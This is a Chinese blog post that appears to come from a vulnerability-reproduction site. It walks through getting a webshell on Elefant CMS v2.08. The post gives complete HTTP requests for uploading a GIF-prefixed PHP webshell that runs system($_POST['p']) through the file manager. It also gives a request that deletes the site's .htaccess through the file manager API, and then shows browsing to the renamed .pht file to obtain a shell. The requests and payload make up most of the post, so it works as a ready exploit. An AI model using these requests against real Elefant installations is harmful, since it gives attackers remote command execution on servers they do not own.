Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)

漏洞空间 2023-05-30 CMS漏洞, 漏洞复现POC

CVE-2017-20063漏洞之后新漏洞,CVE-2017-20063漏洞仅支持1.3版本

 

漏洞出现代码:apps/filemanager/upload/drop.php

Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)

 

首先上传一个文件

127.0.0.1/filemanager

Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)

 

然后重命名为99.pht

Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)

也可以使用如下代码上传php文件测试:

此处我没有上传成功,推荐使用上面的方法:

Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)

POST /filemanager/upload/drop HTTP/1.1
Host: eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Content-Length: 498
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
content-type: multipart/form-data; boundary=------multipartformboundary1685373759841
Accept: */*
Origin: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Referer: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com/blocks/edit?id=members&return=/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1685373004; elefant_user=eqg5f048u4lou6jouog12q5es0; elefant_update_checked=1; elefant_last_page=%2Fuser
Connection: close

--------multipartformboundary1685373759841
Content-Disposition: form-data; name="path"


--------multipartformboundary1685373759841
Content-Disposition: form-data; name="token"

ed50295e5e66b7012faaea35359a60cb
--------multipartformboundary1685373759841
Content-Disposition: form-data; name="file"; filename="11a.php"
Content-Type: xxx

GIF89a
<script language="pHp">phpinfo()</script>
<?php phpinfo();?>
<?php system($_POST['p']);?>

--------multipartformboundary1685373759841--

 

 

随后使用api删除根目录下.htaccess

/filemanager/api/rm/.htaccess

具体数据包如下:

POST /filemanager/api/rm/.htaccess HTTP/1.1
Host: eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Content-Length: 511
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
content-type: multipart/form-data; boundary=------multipartformboundary1685373759841
Accept: */*
Origin: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com
Referer: http://eci-2ze7dz4nghmi76j2ufqy.cloudeci1.ichunqiu.com/blocks/edit?id=members&return=/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1685254512,1685372961; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1685373004; elefant_user=eqg5f048u4lou6jouog12q5es0; elefant_update_checked=1; elefant_last_page=%2Fuser
Connection: close

删除之后可以看到成功的标志:

Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)

 

提示删除伪静态成功:

Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)

访问刚刚修改好的pht文件/files/31.pht

即可获得shell:

Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)

 

 

THE END
分享
二维码
海报
Elefant CMS v2.08获取getshell过程(非CVE-2017-20063)
继CVE-2017-20063漏洞之后新漏洞,CVE-2017-20063漏洞仅支持1.3版本   漏洞出现代码:apps/filemanager/upload/drop.php   首先上传一个文件 127.0.0.1/filemanager   然后重命名为99.pht 也可以……
<<上一篇
下一篇>>